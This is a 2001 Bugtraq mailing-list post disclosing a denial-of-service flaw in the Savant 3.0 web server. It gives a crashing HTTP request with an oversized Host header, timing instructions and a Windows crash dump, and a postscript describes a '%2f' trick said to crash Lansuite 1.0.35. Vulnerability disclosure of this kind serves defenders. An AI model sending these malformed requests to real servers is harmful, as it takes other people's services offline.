[20055] in bugtraq
Savant 3.0 Denial Of Service
daemon@ATHENA.MIT.EDU (nitr0s@HOTMAIL.COM)
Fri Apr 6 04:53:54 2001
Message-ID: <20010405161316.2716.qmail@securityfocus.com>
Date: Thu, 5 Apr 2001 16:13:16 -0000
Reply-To: nitr0s@HOTMAIL.COM
From: nitr0s@HOTMAIL.COM
To: BUGTRAQ@SECURITYFOCUS.COM
Not exactly sure what the problem is because it will
handle the same request from a program that does
the same thing.
"Time is a factor" so pay attention man ;P
Connect to the server using telnet or somthing and
type in the following:
GET / HTTP/1.1
Host:AAAAAAAAAAAAAAAAAAAA.....
Where A x 260, hit return, wait 3 seconds, hit return
again and you should see it crash.I tested this locally
and remotely on both Windows98 and NT-4
Oh yeah, no error messages are given on NT for
some reason, the program simply terminates, yes,
no more connections, got that? the following was
displayed on Windows 98.If you do not give it the
time, it doesn't work, got that okay?
So dont come saying "I threw so many characters at
it and nothing happened" do as i say, and it will work.
SAVANT caused an invalid page fault in
module KERNEL32.DLL at 015f:bff87eb5.
Registers:
EAX=c00300f0 CS=015f EIP=bff87eb5
EFLGS=00010212
EBX=011bff88 SS=0167 ESP=010bffec
EBP=010c0058
ECX=10020c01 DS=0167 ESI=8163c414 FS=41af
EDX=bff76859 ES=0167 EDI=010c0238 GS=0000
Bytes at CS:EIP:
53 56 57 8b 30 83 7d 10 01 8b 4e 38 89 4d f8 75
Stack dump:
Sending the same request using a perl script didn't
seem to affect the server at all, which is why i cant
tell whats wrong.But who cares? *shrug*
----------------------------------------------------------------
cut....
BTW Moderator, because you have been told that
maybe the Lansuite DoS against version 1.0.34
doesn't work can i tell you that it is still effective
against the latest 1.0.35 and is effective locally aswell
as remotely on both windows 98 and NT-4 as i have
tested.I have drwatson logs to prove it.
The trick in the problem is the forward slash before
HTTP/1.1 like %2fHTTP/1.1 - Get me sir?
So update your database please, people depend on
it, even the developers!!!
